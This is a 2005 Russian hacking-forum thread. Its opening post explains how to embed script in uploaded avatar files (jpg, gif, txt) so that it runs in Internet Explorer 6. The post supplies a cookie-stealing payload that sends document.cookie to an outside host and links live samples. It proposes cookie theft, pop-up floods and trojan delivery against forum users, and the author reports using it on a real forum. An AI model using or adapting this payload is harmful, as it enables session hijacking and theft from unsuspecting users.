ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > ИНФО > Статьи
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Уязвимость в IE 6.0 при обработке файлов jpg, gif, txt.
  #1  
Старый 20.04.2005, 10:51
Аватар для SpiderX
SpiderX
Guest
Сообщений: n/a
Провел на форуме:

Репутация:
По умолчанию Уязвимость в IE 6.0 при обработке файлов jpg, gif, txt.

Привет, вы когда-нибудь слышали об уязвимостях jpg или gif?
Да!- скажите вы. Но об уязвимости при обработке в txt вы и не мечтали.
Тогда эта статья для вас.

Недавно загорелся идеей вставить свой скрипт в форум
(Invision Power Board (U) v1.3 Final), через аватар
(многие об этом мечтали =) ). Долго я бился с форумом и все впустую,
форум так просто не сдавался! Немного поразмыслив я решил
попробовать создать файл со скриптом <script>alert("Hacked")</script> и
сохранить в jpg. При загрузке изображения в аватар на форуме ничего из
того что я ожидал не произошло =( . Тогда я решил посмотреть на свою
картинку (аватар) напрямую, через URL: открыл контекстное меню =>
свойства=> получил адрес картинки на форуме, т.е. в той области
форума в которую она загружалась http://www.emu-land.net/forum/uploads/av-552.gif
И что бы вы думали? О-ля-ля, вот сюрприз - скрипт сработал =)
Я попробовал этот фокус с gif - скрипт тоже работал. Как я понял позже,
IE при загрузке картинки на сайт через тег <img> не обрабатывает ее, если в
ней есть скрипт, воспринимает как ошибку, т.к. IE ожидает изображение!
Но при загрузке напрямую в URL, IE ориентируется на синтаксис и =>
скрипт работает =)
Ну и что, что работает, что особенного это нам дает ?
А вот что!
Как часто вы переходите по ссылкам в форуме, особенно если они
имеют вид http://hacker.narod.ru ? Вот и я, честно говоря не особенно
доверяю, но а как часто вы переходите из топика в топик на форуме?
То та =)
Адрес картинки ,а в ней может быть что угодно, будет иметь локальный адрес
т.е. если адрес форума www.site.ru/forum , то адрес картинки будет
www.site.ru/forum/uploads/gif.jpg (в разных форумах по-разному!). Все что
вам остается это дать эту ссылку кому-нибудь на форуме, представим что в
картинке такой скрипт <script>img = new Image();
img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script> или другой
любой сниффер вы получаете в свое пользование cookie почти любого
пользователя. Да и вообще используя эту технолоию, а как оказалось
скрипты срабатывают даже в txt, можно под видом безобидного файла
(txt, gif, jpg(jpeg)) запустить скрипт: 1) бесконечные окна http://foranti.narod.ru/zlieokna.jpg
(будьте осторожны) 2) Использовать pinch (см. видео античат) 3)Похищение
cookie 4) Ваше воображение вам подскажет =)
Данная уязвимость была протестирована на Firefox 1.0, на что он злобно
выругался:"Изображение “http://foranti.narod.ru/1.jpg” не может быть
показано, так как содержит ошибки."
Opera 8.0 , тож... не работает =(
Но учитывая тот факт что от 60-90% пользователей сидят под IE можно
смело идти в бой =)
Так что с милой улыбкой на лице передадим Билли привет =)
Microsoft как всегда на высоте =)

Вот еще примеры:
http://foranti.narod.ru/1.txt
http://foranti.narod.ru/1.gif
http://foranti.narod.ru/1.jpg

Хочу поблагодарить White Jordan, ведь именно он подталкнул меня на то, чтоб еще раз покапаться с аватарой! =)))
 
Ответить с цитированием

  #2  
Старый 20.04.2005, 12:00
Аватар для SpiderX
SpiderX
Guest
Сообщений: n/a
Провел на форуме:

Репутация:
По умолчанию

Народ эту ссылку(http://www.emu-land.net/forum/uploads/av-552.gif) нужно напрямую в Браузере вводить, иначе вас редиректят на главную страницу сайта!
 
Ответить с цитированием

  #3  
Старый 20.04.2005, 12:11
Аватар для SpiderX
SpiderX
Guest
Сообщений: n/a
Провел на форуме:

Репутация:
По умолчанию

Внутри форума ссылка раБотает нормально!
 
Ответить с цитированием

  #4  
Старый 20.04.2005, 12:14
Аватар для SpiderX
SpiderX
Guest
Сообщений: n/a
Провел на форуме:

Репутация:
По умолчанию

 
Ответить с цитированием

  #5  
Старый 20.04.2005, 18:18
Аватар для Rebz
Rebz
Super Moderator
Регистрация: 08.11.2004
Сообщений: 3,395
Провел на форуме:
13166814

Репутация: 3876


По умолчанию

Ссылка является битой или удалённой...

А вообще мысль интересная.. с аватаром).
 
Ответить с цитированием

  #6  
Старый 20.04.2005, 18:40
Аватар для SpiderX
SpiderX
Guest
Сообщений: n/a
Провел на форуме:

Репутация:
По умолчанию

Народ на emu-land Больше ссылка не раБотает!!! =)))
Меня заБанили =)))
Хотя если на прямую заходить http://www.emu-land.net/forum/uploads/av-552.gif, то скрипт еще раБотает!!!
 
Ответить с цитированием

  #7  
Старый 20.04.2005, 21:40
Аватар для 7686923
7686923
Новичок
Регистрация: 14.02.2005
Сообщений: 4
Провел на форуме:
1303

Репутация: 0
По умолчанию

слушай, ты свел скрипт с картинкой пользуясь прогой какой, или аватара на форуме загружает аватару с внешнего сайта?
 
Ответить с цитированием

  #8  
Старый 20.04.2005, 22:18
Аватар для SpiderX
SpiderX
Guest
Сообщений: n/a
Провел на форуме:

Репутация:
По умолчанию

Да аватара грузит ее на сайт!
 
Ответить с цитированием

  #9  
Старый 23.04.2005, 19:44
Аватар для OwrLam
OwrLam
Познающий
Регистрация: 14.05.2004
Сообщений: 49
Провел на форуме:
26695

Репутация: 4
Отправить сообщение для OwrLam с помощью ICQ
По умолчанию

=) Весело.....
Куда уплыли куки???
Ааа..
Куда они ушли???
И где найти им место...
Что внось они нужны =) гг
 
Ответить с цитированием

  #10  
Старый 23.04.2005, 20:30
Аватар для SpiderX
SpiderX
Guest
Сообщений: n/a
Провел на форуме:

Репутация:
По умолчанию

Есть класс куки "ОБычные", а есть класс куки "Водоплавающие"!
Здесь описан класс "Водоплавающих" кук =)))
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ